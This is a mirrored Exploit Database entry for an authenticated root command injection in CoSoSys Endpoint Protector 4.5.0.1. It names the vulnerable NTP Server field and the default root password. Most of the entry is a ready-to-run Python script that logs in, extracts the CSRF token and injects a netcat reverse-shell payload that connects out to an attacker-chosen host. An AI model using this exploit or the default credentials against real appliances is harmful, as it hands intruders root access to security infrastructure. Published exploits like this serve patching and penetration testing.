CoSoSys Endpoint Protector 4.5.0.1 – (Authenticated) Remote Root Command Injection

• Exploit Database
• 15 阅读

• 作者： 0x09AL
  日期： 2018-08-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45131/

• # Title : CoSoSys Endpoint Protector - Authenticated Remote Root Command Injection
  # Date : Vulnerability submitted in 01/12/2017 and published in 01/08/2018
  # Author : 0x09AL
  # Tested on : Endpoint Protector 4.5.0.1
  # Software Link : https://www.endpointprotector.com/
  # Vulnerable Versions : Endpoint Protector <= 4.5.0.1
  # Endpoint Protector suffers from an authenticated command injection vulnerability. By default the username and password are : root:epp2011
  # In the Appliance Tab , Server Maintenance the NTP Server field is vulnerable to command injection. There is a call to sh -c {NTP Server field} which is not validated. Attached is the exploit which does this automatically.
  # The command may take a while to execute.
  
  import requests
  exp = requests.session()
  user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
  
  
  username = 'root'
  password = 'epp2011'
  
  host = 'x.x.x.x.x'
  rev_host = 'x.x.x.x'
  rev_port = '443'
  
  r = exp.post('https://%s/index.php/login' % host,data={'username':username,'password':password,'login':'Login'},verify=False)
  
  shell = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f' % (rev_host,rev_port)
  
  payload = '&& %s' % shell
  print payload
  if(r.text.find("Welcome Guest")>0):
  print "[-] Incorrect credentials [-]"
  else:
  print "[+] Logged in successfully [+]"
  r = exp.get('https://%s/index.php/appliance/maintenance' % host,headers={'X-Requested-With': 'XMLHttpRequest'},verify=False)
  if(r.text.find("csrf")>-1):
  print "[+] Getting CSRF Token [+]"
  csrf_token = r.text.split('value="')[1].split('">')[0]
  
  print "[+] Token: %s [+]" % csrf_token
  post_data = {
  'csrf_token' : csrf_token,
  'continent':'Europe',
  'region' :'Berlin',
  'timeSetting[ntpserver]': payload,
  'timeSetting[timesync]' :'12'
  }
  r = exp.post('https://%s/index.php/appliance/timezone' % host,data=post_data,headers={'X-Requested-With': 'XMLHttpRequest','Referer': 'https://%s/index.php/' % host},verify=False)
  print "[+] Sending exploit [+]"
  
  if(r.text.find("nc")>-1):
  post_data = {
  'ntpserver': payload,
  'continent':'Europe',
  'region' :'Berlin'
  }
  
  r = exp.post('https://%s/index.php/appliance/timezone' % host,data=post_data,headers={'X-Requested-With': 'XMLHttpRequest','Referer': 'https://%s/index.php/' % host},verify=False)
  print "[+] Exploit success [+]"